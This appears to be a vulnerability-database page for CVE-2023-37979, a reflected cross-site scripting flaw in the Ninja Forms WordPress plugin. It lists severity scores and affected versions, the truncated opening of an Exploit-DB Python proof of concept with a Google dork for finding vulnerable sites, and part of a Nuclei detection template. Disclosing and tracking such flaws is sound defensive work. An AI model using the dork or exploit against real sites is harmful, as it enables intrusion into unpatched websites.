CVE-2023-37979
published 2023-07-27CVE-2023-37979: Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Saturday Drive Ninja Forms Contact Form plugin <= 3.6.25 versions.
PriorityP340medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
6.01%
92.4th percentile
Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in Saturday Drive Ninja Forms Contact Form plugin <= 3.6.25 versions.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ninjaforms | ninja_forms | < 3.6.26 | 3.6.26 |
| saturday_drive | ninja_forms_contact_form | n/a – 3.6.25 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS
exploitdb·2023-08-04·CVSS 7.1
CVE-2023-37979 [HIGH] WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS
WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS
---
# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)
# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt
# Date: 2023-07-27
# Exploit Author: Mehran Seifalinia
# Vendor Homepage: https://ninjaforms.com/
# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip
# Version: 3.6.25
# Tested on: Windows 10
# CVE: CVE-2023-37979
from requests import get
from sys import argv
from os import getcwd
import webbrowser
from time import sleep
# Values:
url = argv[-1]
if url[-1] == "/":
url = url.rstrip("/")
# Constants
CVE_NAME = "CVE-2023-37979"
VULNERABLE_VERSION = "3.6.25"
# HTML template
HTML_TEMPLATE = f"""
{CVE_NAME}
body {{
font-family: Arial, sans-serif;
background-
Nuclei
Ninja Forms < 3.6.26 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2023-37979 [MEDIUM] Ninja Forms < 3.6.26 - Cross-Site Scripting
Ninja Forms ") && contains(body_2, "import_form_template")'
- 'status_code_2 == 200'
condition: and
# digest: 4a0a0047304502204a42cc8ed5d1cb4f490b22a0edb21ac86b6003ce9d60da45604ef60a0785d634022100aa119b91c64ec4e76c2bc997e53bb783071ab7a462166e4e96e1bc721d2f0e5d:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
http://packetstormsecurity.com/files/173983/WordPress-Ninja-Forms-3.6.25-Cross-Site-Scripting.htmlhttps://patchstack.com/articles/multiple-high-severity-vulnerabilities-in-ninja-forms-plugin?_s_id=cvehttps://patchstack.com/database/vulnerability/ninja-forms/wordpress-ninja-forms-plugin-3-6-25-reflected-cross-site-scripting-xss-vulnerability?_s_id=cvehttp://packetstormsecurity.com/files/173983/WordPress-Ninja-Forms-3.6.25-Cross-Site-Scripting.htmlhttps://patchstack.com/articles/multiple-high-severity-vulnerabilities-in-ninja-forms-plugin?_s_id=cvehttps://patchstack.com/database/vulnerability/ninja-forms/wordpress-ninja-forms-plugin-3-6-25-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
2023-07-27
Published